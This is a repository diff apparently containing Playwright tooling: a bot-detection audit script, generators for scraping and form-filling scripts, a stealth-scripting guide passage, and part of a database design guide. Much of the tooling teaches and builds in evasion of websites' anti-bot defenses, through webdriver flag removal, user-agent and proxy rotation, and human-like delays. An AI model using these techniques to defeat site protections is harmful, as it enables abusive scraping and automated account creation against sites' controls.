Object.defineProperty(navigator, 'languages', {
get: () => ['en-US', 'en'],
});
""")
# From file
await context.add_init_script(path="stealth.js")
```
## Common Automation Patterns
### Scrolling
```python
# Scroll to bottom
await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
# Scroll element into view
await page.locator("div.target").scroll_into_view_if_needed()
# Smooth scroll simulation
await page.evaluate("""
async () => {
const delay = ms => new Promise(r => setTimeout(r, ms));
for (let i = 0; i < document.body.scrollHeight; i += 300) {
window.scrollTo(0, i);
await delay(100);
}
}
""")
```
### Clipboard Operations
```python
# Copy text
await page.evaluate("navigator.clipboard.writeText('hello')")
# Paste via keyboard
await page.keyboard.press("Control+v")
```
### Shadow DOM
```python
# Playwright pierces open shadow DOM with >> operator
await page.locator("my-component >> .inner-button").click()
# Or use the css= engine with >> for chained piercing
await page.locator("css=host-element >> css=.shadow-child").click()
```

View File

@@ -0,0 +1,520 @@
#!/usr/bin/env python3
"""
Anti-Detection Checker - Audits Playwright scripts for common bot detection vectors.
Analyzes a Playwright automation script and identifies patterns that make the
browser detectable as a bot. Produces a risk score (0-100) with specific
recommendations for each issue found.
Detection vectors checked:
- Headless mode usage
- Default/missing user agent configuration
- Viewport size (default 800x600 is a red flag)
- WebDriver flag (navigator.webdriver)
- Navigator property overrides
- Request throttling / human-like delays
- Cookie/session management
- Proxy configuration
- Error handling patterns
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict
from typing import List, Optional
@dataclass
class Finding:
"""A single detection risk finding."""
category: str
severity: str # "critical", "high", "medium", "low", "info"
description: str
line: Optional[int]
recommendation: str
weight: int # Points added to risk score (0-15)
SEVERITY_WEIGHTS = {
"critical": 15,
"high": 10,
"medium": 5,
"low": 2,
"info": 0,
}
class AntiDetectionChecker:
"""Analyzes Playwright scripts for bot detection vulnerabilities."""
def __init__(self, script_content: str, file_path: str = "<stdin>"):
self.content = script_content
self.lines = script_content.split("\n")
self.file_path = file_path
self.findings: List[Finding] = []
def check_all(self) -> List[Finding]:
"""Run all detection checks."""
self._check_headless_mode()
self._check_user_agent()
self._check_viewport()
self._check_webdriver_flag()
self._check_navigator_properties()
self._check_request_delays()
self._check_error_handling()
self._check_proxy()
self._check_session_management()
self._check_browser_close()
self._check_stealth_imports()
return self.findings
def _find_line(self, pattern: str) -> Optional[int]:
"""Find the first line number matching a regex pattern."""
for i, line in enumerate(self.lines, 1):
if re.search(pattern, line):
return i
return None
def _has_pattern(self, pattern: str) -> bool:
"""Check if pattern exists anywhere in the script."""
return bool(re.search(pattern, self.content))
def _check_headless_mode(self):
"""Check if headless mode is properly configured."""
if self._has_pattern(r"headless\s*=\s*False"):
self.findings.append(Finding(
category="Headless Mode",
severity="high",
description="Browser launched in headed mode (headless=False). This is fine for development but should be headless=True in production.",
line=self._find_line(r"headless\s*=\s*False"),
recommendation="Use headless=True for production. Toggle via environment variable: headless=os.environ.get('HEADLESS', 'true') == 'true'",
weight=SEVERITY_WEIGHTS["high"],
))
elif not self._has_pattern(r"headless"):
# Default is headless=True in Playwright, which is correct
self.findings.append(Finding(
category="Headless Mode",
severity="info",
description="Using default headless mode (True). Good for production.",
line=None,
recommendation="No action needed. Default headless=True is correct.",
weight=SEVERITY_WEIGHTS["info"],
))
def _check_user_agent(self):
"""Check if a custom user agent is set."""
has_ua = self._has_pattern(r"user_agent\s*=") or self._has_pattern(r"userAgent")
has_ua_list = self._has_pattern(r"USER_AGENTS?\s*=\s*\[")
has_random_ua = self._has_pattern(r"random\.choice.*(?:USER_AGENT|user_agent|ua)")
if not has_ua:
self.findings.append(Finding(
category="User Agent",
severity="critical",
description="No custom user agent configured. Playwright's default user agent contains 'HeadlessChrome' which is trivially detected.",
line=None,
recommendation="Set a realistic user agent: context = await browser.new_context(user_agent='Mozilla/5.0 ...')",
weight=SEVERITY_WEIGHTS["critical"],
))
elif has_ua_list and has_random_ua:
self.findings.append(Finding(
category="User Agent",
severity="info",
description="User agent rotation detected. Good anti-detection practice.",
line=self._find_line(r"USER_AGENTS?\s*=\s*\["),
recommendation="Ensure user agents are recent and match the browser being launched (e.g., Chrome UA for Chromium).",
weight=SEVERITY_WEIGHTS["info"],
))
elif has_ua:
self.findings.append(Finding(
category="User Agent",
severity="low",
description="Custom user agent set but no rotation detected. Single user agent is fingerprint-able at scale.",
line=self._find_line(r"user_agent\s*="),
recommendation="Rotate through 5-10 recent user agents using random.choice().",
weight=SEVERITY_WEIGHTS["low"],
))
def _check_viewport(self):
"""Check viewport configuration."""
has_viewport = self._has_pattern(r"viewport\s*=\s*\{") or self._has_pattern(r"viewport.*width")
if not has_viewport:
self.findings.append(Finding(
category="Viewport Size",
severity="high",
description="No viewport configured. Default Playwright viewport (1280x720) is common among bots. Sites may flag unusual viewport distributions.",
line=None,
recommendation="Set a common desktop viewport: viewport={'width': 1920, 'height': 1080}. Vary across runs.",
weight=SEVERITY_WEIGHTS["high"],
))
else:
# Check for suspiciously small viewports
match = re.search(r"width['\"]?\s*[:=]\s*(\d+)", self.content)
if match:
width = int(match.group(1))
if width < 1024:
self.findings.append(Finding(
category="Viewport Size",
severity="medium",
description=f"Viewport width {width}px is unusually small. Most desktop browsers are 1366px+ wide.",
line=self._find_line(r"width.*" + str(width)),
recommendation="Use 1366x768 (most common) or 1920x1080. Avoid unusual sizes like 800x600.",
weight=SEVERITY_WEIGHTS["medium"],
))
else:
self.findings.append(Finding(
category="Viewport Size",
severity="info",
description=f"Viewport width {width}px is reasonable.",
line=self._find_line(r"width.*" + str(width)),
recommendation="No action needed.",
weight=SEVERITY_WEIGHTS["info"],
))
def _check_webdriver_flag(self):
"""Check if navigator.webdriver is being removed."""
has_webdriver_override = (
self._has_pattern(r"navigator.*webdriver") or
self._has_pattern(r"webdriver.*undefined") or
self._has_pattern(r"add_init_script.*webdriver")
)
if not has_webdriver_override:
self.findings.append(Finding(
category="WebDriver Flag",
severity="critical",
description="navigator.webdriver is not overridden. This is the most common bot detection check. Every major anti-bot service tests this property.",
line=None,
recommendation=(
"Add init script to remove the flag:\n"
" await page.add_init_script(\"Object.defineProperty(navigator, 'webdriver', {get: () => undefined});\")"
),
weight=SEVERITY_WEIGHTS["critical"],
))
else:
self.findings.append(Finding(
category="WebDriver Flag",
severity="info",
description="navigator.webdriver override detected.",
line=self._find_line(r"webdriver"),
recommendation="No action needed.",
weight=SEVERITY_WEIGHTS["info"],
))
def _check_navigator_properties(self):
"""Check for additional navigator property hardening."""
checks = {
"plugins": (r"navigator.*plugins", "navigator.plugins is empty in headless mode. Real browsers report installed plugins."),
"languages": (r"navigator.*languages", "navigator.languages should be set to match the user agent locale."),
"platform": (r"navigator.*platform", "navigator.platform should match the user agent OS."),
}
overridden_count = 0
for prop, (pattern, desc) in checks.items():
if self._has_pattern(pattern):
overridden_count += 1
if overridden_count == 0:
self.findings.append(Finding(
category="Navigator Properties",
severity="medium",
description="No navigator property hardening detected. Advanced anti-bot services check plugins, languages, and platform properties.",
line=None,
recommendation="Override navigator.plugins, navigator.languages, and navigator.platform via add_init_script() to match realistic browser fingerprints.",
weight=SEVERITY_WEIGHTS["medium"],
))
elif overridden_count < 3:
self.findings.append(Finding(
category="Navigator Properties",
severity="low",
description=f"Partial navigator hardening ({overridden_count}/3 properties). Consider covering all three: plugins, languages, platform.",
line=None,
recommendation="Add overrides for any missing properties among: plugins, languages, platform.",
weight=SEVERITY_WEIGHTS["low"],
))
def _check_request_delays(self):
"""Check for human-like request delays."""
has_sleep = self._has_pattern(r"asyncio\.sleep") or self._has_pattern(r"wait_for_timeout")
has_random_delay = (
self._has_pattern(r"random\.(uniform|randint|random)") and has_sleep
)
if not has_sleep:
self.findings.append(Finding(
category="Request Timing",
severity="high",
description="No delays between actions detected. Machine-speed interactions are the easiest behavior-based detection signal.",
line=None,
recommendation="Add random delays between page interactions: await asyncio.sleep(random.uniform(0.5, 2.0))",
weight=SEVERITY_WEIGHTS["high"],
))
elif not has_random_delay:
self.findings.append(Finding(
category="Request Timing",
severity="medium",
description="Fixed delays detected but no randomization. Constant timing intervals are detectable patterns.",
line=self._find_line(r"(asyncio\.sleep|wait_for_timeout)"),
recommendation="Use random delays: random.uniform(min_seconds, max_seconds) instead of fixed values.",
weight=SEVERITY_WEIGHTS["medium"],
))
else:
self.findings.append(Finding(
category="Request Timing",
severity="info",
description="Randomized delays detected between actions.",
line=self._find_line(r"random\.(uniform|randint)"),
recommendation="No action needed. Ensure delays are realistic (0.5-3s for browsing, 1-5s for reading).",
weight=SEVERITY_WEIGHTS["info"],
))
def _check_error_handling(self):
"""Check for error handling patterns."""
has_try_except = self._has_pattern(r"try\s*:") and self._has_pattern(r"except")
has_retry = self._has_pattern(r"retr(y|ies)") or self._has_pattern(r"max_retries|max_attempts")
if not has_try_except:
self.findings.append(Finding(
category="Error Handling",
severity="medium",
description="No try/except blocks found. Unhandled errors will crash the automation and leave browser instances running.",
line=None,
recommendation="Wrap page interactions in try/except. Handle TimeoutError, network errors, and element-not-found gracefully.",
weight=SEVERITY_WEIGHTS["medium"],
))
elif not has_retry:
self.findings.append(Finding(
category="Error Handling",
severity="low",
description="Error handling present but no retry logic detected. Transient failures (network blips, slow loads) will cause data loss.",
line=None,
recommendation="Add retry with exponential backoff for network operations and element interactions.",
weight=SEVERITY_WEIGHTS["low"],
))
def _check_proxy(self):
"""Check for proxy configuration."""
has_proxy = self._has_pattern(r"proxy\s*=\s*\{") or self._has_pattern(r"proxy.*server")
if not has_proxy:
self.findings.append(Finding(
category="Proxy",
severity="low",
description="No proxy configuration detected. Running from a single IP address is fine for small jobs but will trigger rate limits at scale.",
line=None,
recommendation="For high-volume scraping, use rotating proxies: proxy={'server': 'http://proxy:port'}",
weight=SEVERITY_WEIGHTS["low"],
))
def _check_session_management(self):
"""Check for session/cookie management."""
has_storage_state = self._has_pattern(r"storage_state")
has_cookies = self._has_pattern(r"cookies\(\)") or self._has_pattern(r"add_cookies")
if not has_storage_state and not has_cookies:
self.findings.append(Finding(
category="Session Management",
severity="low",
description="No session persistence detected. Each run will start fresh, requiring re-authentication.",
line=None,
recommendation="Use storage_state() to save/restore sessions across runs. This avoids repeated logins that may trigger security alerts.",
weight=SEVERITY_WEIGHTS["low"],
))
def _check_browser_close(self):
"""Check if browser is properly closed."""
has_close = self._has_pattern(r"browser\.close\(\)") or self._has_pattern(r"await.*close")
has_context_manager = self._has_pattern(r"async\s+with\s+async_playwright")
if not has_close and not has_context_manager:
self.findings.append(Finding(
category="Resource Cleanup",
severity="medium",
description="No browser.close() or context manager detected. Browser processes will leak on failure.",
line=None,
recommendation="Use 'async with async_playwright() as p:' or ensure browser.close() is in a finally block.",
weight=SEVERITY_WEIGHTS["medium"],
))
def _check_stealth_imports(self):
"""Check for stealth/anti-detection library usage."""
has_stealth = self._has_pattern(r"playwright_stealth|stealth_async|undetected")
if has_stealth:
self.findings.append(Finding(
category="Stealth Library",
severity="info",
description="Third-party stealth library detected. These provide additional fingerprint evasion but add dependencies.",
line=self._find_line(r"playwright_stealth|stealth_async|undetected"),
recommendation="Stealth libraries are helpful but not a silver bullet. Still implement manual checks for user agent, viewport, and timing.",
weight=SEVERITY_WEIGHTS["info"],
))
def get_risk_score(self) -> int:
"""Calculate overall risk score (0-100). Higher = more detectable."""
raw_score = sum(f.weight for f in self.findings)
# Cap at 100
return min(raw_score, 100)
def get_risk_level(self) -> str:
"""Get human-readable risk level."""
score = self.get_risk_score()
if score <= 10:
return "LOW"
elif score <= 30:
return "MODERATE"
elif score <= 50:
return "HIGH"
else:
return "CRITICAL"
def get_summary(self) -> dict:
"""Get a summary of the analysis."""
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
for f in self.findings:
severity_counts[f.severity] += 1
return {
"file": self.file_path,
"risk_score": self.get_risk_score(),
"risk_level": self.get_risk_level(),
"total_findings": len(self.findings),
"severity_counts": severity_counts,
"actionable_findings": len([f for f in self.findings if f.severity != "info"]),
}
def format_text_report(checker: AntiDetectionChecker, verbose: bool = False) -> str:
"""Format findings as human-readable text."""
lines = []
summary = checker.get_summary()
lines.append("=" * 60)
lines.append(" ANTI-DETECTION AUDIT REPORT")
lines.append("=" * 60)
lines.append(f"File: {summary['file']}")
lines.append(f"Risk Score: {summary['risk_score']}/100 ({summary['risk_level']})")
lines.append(f"Total Issues: {summary['actionable_findings']} actionable, {summary['severity_counts']['info']} info")
lines.append("")
# Severity breakdown
for sev in ["critical", "high", "medium", "low"]:
count = summary["severity_counts"][sev]
if count > 0:
lines.append(f" {sev.upper():10s} {count}")
lines.append("")
# Findings grouped by severity
severity_order = ["critical", "high", "medium", "low"]
if verbose:
severity_order.append("info")
for sev in severity_order:
sev_findings = [f for f in checker.findings if f.severity == sev]
if not sev_findings:
continue
lines.append(f"--- {sev.upper()} ---")
for f in sev_findings:
line_info = f" (line {f.line})" if f.line else ""
lines.append(f" [{f.category}]{line_info}")
lines.append(f" {f.description}")
lines.append(f" Fix: {f.recommendation}")
lines.append("")
# Exit code guidance
lines.append("-" * 60)
score = summary["risk_score"]
if score <= 10:
lines.append("Result: PASS - Low detection risk.")
elif score <= 30:
lines.append("Result: PASS with warnings - Address medium/high issues for production use.")
else:
lines.append("Result: FAIL - High detection risk. Fix critical and high issues before deploying.")
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Audit a Playwright script for common bot detection vectors.",
epilog=(
"Examples:\n"
" %(prog)s --file scraper.py\n"
" %(prog)s --file scraper.py --verbose\n"
" %(prog)s --file scraper.py --json\n"
"\n"
"Exit codes:\n"
" 0 - Low risk (score 0-10)\n"
" 1 - Moderate to high risk (score 11-50)\n"
" 2 - Critical risk (score 51+)\n"
),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--file",
required=True,
help="Path to the Playwright script to audit",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_output",
default=False,
help="Output results as JSON",
)
parser.add_argument(
"--verbose",
action="store_true",
default=False,
help="Include informational (non-actionable) findings in output",
)
args = parser.parse_args()
file_path = os.path.abspath(args.file)
if not os.path.isfile(file_path):
print(f"Error: File not found: {file_path}", file=sys.stderr)
sys.exit(2)
try:
with open(file_path, "r", encoding="utf-8") as f:
content = f.read()
except Exception as e:
print(f"Error reading file: {e}", file=sys.stderr)
sys.exit(2)
if not content.strip():
print("Error: File is empty.", file=sys.stderr)
sys.exit(2)
checker = AntiDetectionChecker(content, file_path)
checker.check_all()
if args.json_output:
output = checker.get_summary()
output["findings"] = [asdict(f) for f in checker.findings]
if not args.verbose:
output["findings"] = [f for f in output["findings"] if f["severity"] != "info"]
print(json.dumps(output, indent=2))
else:
print(format_text_report(checker, verbose=args.verbose))
# Exit code based on risk
score = checker.get_risk_score()
if score <= 10:
sys.exit(0)
elif score <= 50:
sys.exit(1)
else:
sys.exit(2)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,324 @@
#!/usr/bin/env python3
"""
Form Automation Builder - Generates Playwright form-fill automation scripts.
Takes a JSON field specification and target URL, then produces a ready-to-run
Playwright script that fills forms, handles multi-step flows, and manages
file uploads.
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import os
import sys
import textwrap
from datetime import datetime
SUPPORTED_FIELD_TYPES = {
"text": "page.fill('{selector}', '{value}')",
"password": "page.fill('{selector}', '{value}')",
"email": "page.fill('{selector}', '{value}')",
"textarea": "page.fill('{selector}', '{value}')",
"select": "page.select_option('{selector}', value='{value}')",
"checkbox": "page.check('{selector}')" if True else "page.uncheck('{selector}')",
"radio": "page.check('{selector}')",
"file": "page.set_input_files('{selector}', '{value}')",
"click": "page.click('{selector}')",
}
def validate_fields(fields):
"""Validate the field specification format. Returns list of issues."""
issues = []
if not isinstance(fields, list):
issues.append("Top-level structure must be a JSON array of field objects.")
return issues
for i, field in enumerate(fields):
if not isinstance(field, dict):
issues.append(f"Field {i}: must be a JSON object.")
continue
if "selector" not in field:
issues.append(f"Field {i}: missing required 'selector' key.")
if "type" not in field:
issues.append(f"Field {i}: missing required 'type' key.")
elif field["type"] not in SUPPORTED_FIELD_TYPES:
issues.append(
f"Field {i}: unsupported type '{field['type']}'. "
f"Supported: {', '.join(sorted(SUPPORTED_FIELD_TYPES.keys()))}"
)
if field.get("type") not in ("checkbox", "radio", "click") and "value" not in field:
issues.append(f"Field {i}: missing 'value' for type '{field.get('type', '?')}'.")
return issues
def generate_field_action(field, indent=8):
"""Generate the Playwright action line for a single field."""
ftype = field["type"]
selector = field["selector"]
value = field.get("value", "")
label = field.get("label", selector)
prefix = " " * indent
lines = []
lines.append(f'{prefix}# {label}')
if ftype == "checkbox":
if field.get("value", "true").lower() in ("true", "yes", "1", "on"):
lines.append(f'{prefix}await page.check("{selector}")')
else:
lines.append(f'{prefix}await page.uncheck("{selector}")')
elif ftype == "radio":
lines.append(f'{prefix}await page.check("{selector}")')
elif ftype == "click":
lines.append(f'{prefix}await page.click("{selector}")')
elif ftype == "select":
lines.append(f'{prefix}await page.select_option("{selector}", value="{value}")')
elif ftype == "file":
lines.append(f'{prefix}await page.set_input_files("{selector}", "{value}")')
else:
# text, password, email, textarea
lines.append(f'{prefix}await page.fill("{selector}", "{value}")')
# Add optional wait_after
wait_after = field.get("wait_after")
if wait_after:
lines.append(f'{prefix}await page.wait_for_selector("{wait_after}")')
return "\n".join(lines)
def build_form_script(url, fields, output_format="script"):
"""Build a Playwright form automation script from the field specification."""
issues = validate_fields(fields)
if issues:
return None, issues
if output_format == "json":
config = {
"url": url,
"fields": fields,
"field_count": len(fields),
"field_types": list(set(f["type"] for f in fields)),
"has_file_upload": any(f["type"] == "file" for f in fields),
"generated_at": datetime.now().isoformat(),
}
return config, None
# Group fields into steps if step markers are present
steps = {}
for field in fields:
step = field.get("step", 1)
if step not in steps:
steps[step] = []
steps[step].append(field)
multi_step = len(steps) > 1
# Generate step functions
step_functions = []
for step_num in sorted(steps.keys()):
step_fields = steps[step_num]
actions = "\n".join(generate_field_action(f) for f in step_fields)
if multi_step:
fn = textwrap.dedent(f"""\
async def fill_step_{step_num}(page):
\"\"\"Fill form step {step_num} ({len(step_fields)} fields).\"\"\"
print(f"Filling step {step_num}...")
{actions}
print(f"Step {step_num} complete.")
""")
else:
fn = textwrap.dedent(f"""\
async def fill_form(page):
\"\"\"Fill form ({len(step_fields)} fields).\"\"\"
print("Filling form...")
{actions}
print("Form filled.")
""")
step_functions.append(fn)
step_functions_str = "\n\n".join(step_functions)
# Generate main() call sequence
if multi_step:
step_calls = "\n".join(
f" await fill_step_{n}(page)" for n in sorted(steps.keys())
)
else:
step_calls = " await fill_form(page)"
submit_selector = None
for field in fields:
if field.get("type") == "click" and field.get("is_submit"):
submit_selector = field["selector"]
break
submit_block = ""
if submit_selector:
submit_block = textwrap.dedent(f"""\
# Submit
await page.click("{submit_selector}")
await page.wait_for_load_state("networkidle")
print("Form submitted.")
""")
script = textwrap.dedent(f'''\
#!/usr/bin/env python3
"""
Auto-generated Playwright form automation script.
Target: {url}
Fields: {len(fields)}
Steps: {len(steps)}
Generated: {datetime.now().isoformat()}
Requirements:
pip install playwright
playwright install chromium
"""
import asyncio
import random
from playwright.async_api import async_playwright
URL = "{url}"
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
{step_functions_str}
async def main():
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
context = await browser.new_context(
viewport={{"width": 1920, "height": 1080}},
user_agent=random.choice(USER_AGENTS),
)
page = await context.new_page()
await page.add_init_script(
"Object.defineProperty(navigator, \'webdriver\', {{get: () => undefined}});"
)
print(f"Navigating to {{URL}}...")
await page.goto(URL, wait_until="networkidle")
{step_calls}
{submit_block}
print("Automation complete.")
await browser.close()
if __name__ == "__main__":
asyncio.run(main())
''')
return script, None
def main():
parser = argparse.ArgumentParser(
description="Generate Playwright form-fill automation scripts from a JSON field specification.",
epilog=textwrap.dedent("""\
Examples:
%(prog)s --url https://example.com/signup --fields fields.json
%(prog)s --url https://example.com/signup --fields fields.json --output fill_form.py
%(prog)s --url https://example.com/signup --fields fields.json --json
Field specification format (fields.json):
[
{"selector": "#email", "type": "email", "value": "user@example.com", "label": "Email"},
{"selector": "#password", "type": "password", "value": "s3cret"},
{"selector": "#country", "type": "select", "value": "US"},
{"selector": "#terms", "type": "checkbox", "value": "true"},
{"selector": "#avatar", "type": "file", "value": "/path/to/photo.jpg"},
{"selector": "button[type='submit']", "type": "click", "is_submit": true}
]
Supported field types: text, password, email, textarea, select, checkbox, radio, file, click
Multi-step forms: Add "step": N to each field to group into steps.
"""),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--url",
required=True,
help="Target form URL",
)
parser.add_argument(
"--fields",
required=True,
help="Path to JSON file containing field specifications",
)
parser.add_argument(
"--output",
help="Output file path (default: stdout)",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_output",
default=False,
help="Output JSON configuration instead of Python script",
)
args = parser.parse_args()
# Load fields
fields_path = os.path.abspath(args.fields)
if not os.path.isfile(fields_path):
print(f"Error: Fields file not found: {fields_path}", file=sys.stderr)
sys.exit(2)
try:
with open(fields_path, "r") as f:
fields = json.load(f)
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in {fields_path}: {e}", file=sys.stderr)
sys.exit(2)
output_format = "json" if args.json_output else "script"
result, errors = build_form_script(
url=args.url,
fields=fields,
output_format=output_format,
)
if errors:
print("Validation errors:", file=sys.stderr)
for err in errors:
print(f" - {err}", file=sys.stderr)
sys.exit(2)
if args.json_output:
output_text = json.dumps(result, indent=2)
else:
output_text = result
if args.output:
output_path = os.path.abspath(args.output)
with open(output_path, "w") as f:
f.write(output_text)
if not args.json_output:
os.chmod(output_path, 0o755)
print(f"Written to {output_path}", file=sys.stderr)
sys.exit(0)
else:
print(output_text)
sys.exit(0)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,248 @@
#!/usr/bin/env python3
"""
Scraping Toolkit - Generates Playwright scraping script skeletons.
Takes a URL pattern and CSS selectors as input and produces a ready-to-run
Playwright scraping script with pagination support, error handling, and
anti-detection patterns baked in.
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import os
import sys
import textwrap
from datetime import datetime
def build_scraping_script(url, selectors, paginate=False, output_format="script"):
"""Build a Playwright scraping script from the given parameters."""
selector_list = [s.strip() for s in selectors.split(",") if s.strip()]
if not selector_list:
return None, "No valid selectors provided."
field_names = []
for sel in selector_list:
# Derive field name from selector: .product-title -> product_title
name = sel.strip("#.[]()>:+~ ")
name = name.replace("-", "_").replace(" ", "_").replace(".", "_")
# Remove non-alphanumeric
name = "".join(c if c.isalnum() or c == "_" else "" for c in name)
if not name:
name = f"field_{len(field_names)}"
field_names.append(name)
field_map = dict(zip(field_names, selector_list))
if output_format == "json":
config = {
"url": url,
"selectors": field_map,
"pagination": {
"enabled": paginate,
"next_selector": "a:has-text('Next'), button:has-text('Next')",
"max_pages": 50,
},
"anti_detection": {
"random_delay_ms": [800, 2500],
"user_agent_rotation": True,
"viewport": {"width": 1920, "height": 1080},
},
"output": {
"format": "jsonl",
"deduplicate_by": field_names[0] if field_names else None,
},
"generated_at": datetime.now().isoformat(),
}
return config, None
# Build Python script
fields_dict_str = "{\n"
for name, sel in field_map.items():
fields_dict_str += f' "{name}": "{sel}",\n'
fields_dict_str += " }"
pagination_block = ""
if paginate:
pagination_block = textwrap.dedent("""\
# --- Pagination ---
async def scrape_all_pages(page, container, fields, next_sel, max_pages=50):
all_items = []
for page_num in range(max_pages):
print(f"Scraping page {page_num + 1}...")
items = await extract_items(page, container, fields)
all_items.extend(items)
next_btn = page.locator(next_sel)
if await next_btn.count() == 0:
break
try:
is_disabled = await next_btn.is_disabled()
except Exception:
is_disabled = True
if is_disabled:
break
await next_btn.click()
await page.wait_for_load_state("networkidle")
await asyncio.sleep(random.uniform(0.8, 2.5))
return all_items
""")
main_call = "scrape_all_pages(page, CONTAINER, FIELDS, NEXT_SELECTOR)" if paginate else "extract_items(page, CONTAINER, FIELDS)"
script = textwrap.dedent(f'''\
#!/usr/bin/env python3
"""
Auto-generated Playwright scraping script.
Target: {url}
Generated: {datetime.now().isoformat()}
Requirements:
pip install playwright
playwright install chromium
"""
import asyncio
import json
import random
from playwright.async_api import async_playwright
# --- Configuration ---
URL = "{url}"
CONTAINER = "body" # Adjust to the repeating item container selector
FIELDS = {fields_dict_str}
NEXT_SELECTOR = "a:has-text('Next'), button:has-text('Next')"
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
async def extract_items(page, container_selector, field_map):
"""Extract structured data from repeating elements."""
items = []
cards = await page.query_selector_all(container_selector)
for card in cards:
item = {{}}
for name, selector in field_map.items():
el = await card.query_selector(selector)
if el:
item[name] = (await el.text_content() or "").strip()
else:
item[name] = None
items.append(item)
return items
{pagination_block}
async def main():
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
context = await browser.new_context(
viewport={{"width": 1920, "height": 1080}},
user_agent=random.choice(USER_AGENTS),
)
page = await context.new_page()
# Remove WebDriver flag
await page.add_init_script(
"Object.defineProperty(navigator, \'webdriver\', {{get: () => undefined}});"
)
print(f"Navigating to {{URL}}...")
await page.goto(URL, wait_until="networkidle")
data = await {main_call}
print(json.dumps(data, indent=2, ensure_ascii=False))
await browser.close()
if __name__ == "__main__":
asyncio.run(main())
''')
return script, None
def main():
parser = argparse.ArgumentParser(
description="Generate Playwright scraping script skeletons from URL and selectors.",
epilog=(
"Examples:\n"
" %(prog)s --url https://example.com/products --selectors '.title,.price,.rating'\n"
" %(prog)s --url https://example.com/search --selectors '.name,.desc' --paginate\n"
" %(prog)s --url https://example.com --selectors '.item' --json\n"
" %(prog)s --url https://example.com --selectors '.item' --output scraper.py\n"
),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--url",
required=True,
help="Target URL to scrape",
)
parser.add_argument(
"--selectors",
required=True,
help="Comma-separated CSS selectors for data fields (e.g. '.title,.price,.rating')",
)
parser.add_argument(
"--paginate",
action="store_true",
default=False,
help="Include pagination handling in generated script",
)
parser.add_argument(
"--output",
help="Output file path (default: stdout)",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_output",
default=False,
help="Output JSON configuration instead of Python script",
)
args = parser.parse_args()
output_format = "json" if args.json_output else "script"
result, error = build_scraping_script(
url=args.url,
selectors=args.selectors,
paginate=args.paginate,
output_format=output_format,
)
if error:
print(f"Error: {error}", file=sys.stderr)
sys.exit(2)
if args.json_output:
output_text = json.dumps(result, indent=2)
else:
output_text = result
if args.output:
output_path = os.path.abspath(args.output)
with open(output_path, "w") as f:
f.write(output_text)
if not args.json_output:
os.chmod(output_path, 0o755)
print(f"Written to {output_path}", file=sys.stderr)
sys.exit(0)
else:
print(output_text)
sys.exit(0)
if __name__ == "__main__":
main()

View File

@@ -59,6 +59,229 @@ A comprehensive database design skill that provides expert-level analysis, optim
4. **Validate inputs**: Prevent SQL injection attacks
5. **Regular security updates**: Keep database software current
## Query Generation Patterns
### SELECT with JOINs
```sql
-- INNER JOIN: only matching rows
SELECT o.id, c.name, o.total
FROM orders o
INNER JOIN customers c ON c.id = o.customer_id;
-- LEFT JOIN: all left rows, NULLs for non-matches
SELECT c.name, COUNT(o.id) AS order_count
FROM customers c
LEFT JOIN orders o ON o.customer_id = c.id
GROUP BY c.name;
-- Self-join: hierarchical data (employees/managers)
SELECT e.name AS employee, m.name AS manager
FROM employees e
LEFT JOIN employees m ON m.id = e.manager_id;
```
### Common Table Expressions (CTEs)
```sql
-- Recursive CTE for org chart
WITH RECURSIVE org AS (
SELECT id, name, manager_id, 1 AS depth
FROM employees WHERE manager_id IS NULL
UNION ALL
SELECT e.id, e.name, e.manager_id, o.depth + 1
FROM employees e INNER JOIN org o ON o.id = e.manager_id
)
SELECT * FROM org ORDER BY depth, name;
```
### Window Functions
```sql
-- ROW_NUMBER for pagination / dedup
SELECT *, ROW_NUMBER() OVER (PARTITION BY customer_id ORDER BY created_at DESC) AS rn
FROM orders;
-- RANK with gaps, DENSE_RANK without gaps
SELECT name, score, RANK() OVER (ORDER BY score DESC) AS rank FROM leaderboard;
-- LAG/LEAD for comparing adjacent rows
SELECT date, revenue,
revenue - LAG(revenue) OVER (ORDER BY date) AS daily_change
FROM daily_sales;
```
### Aggregation Patterns
```sql
-- FILTER clause (PostgreSQL) for conditional aggregation
SELECT
COUNT(*) AS total,
COUNT(*) FILTER (WHERE status = 'active') AS active,
AVG(amount) FILTER (WHERE amount > 0) AS avg_positive
FROM accounts;
-- GROUPING SETS for multi-level rollups
SELECT region, product, SUM(revenue)
FROM sales
GROUP BY GROUPING SETS ((region, product), (region), ());
```
---
## Migration Patterns
### Up/Down Migration Scripts
Every migration must have a reversible counterpart. Name files with a timestamp prefix for ordering:
```
migrations/
├── 20260101_000001_create_users.up.sql
├── 20260101_000001_create_users.down.sql
├── 20260115_000002_add_users_email_index.up.sql
└── 20260115_000002_add_users_email_index.down.sql
```
### Zero-Downtime Migrations (Expand/Contract)
Use the expand-contract pattern to avoid locking or breaking running code:
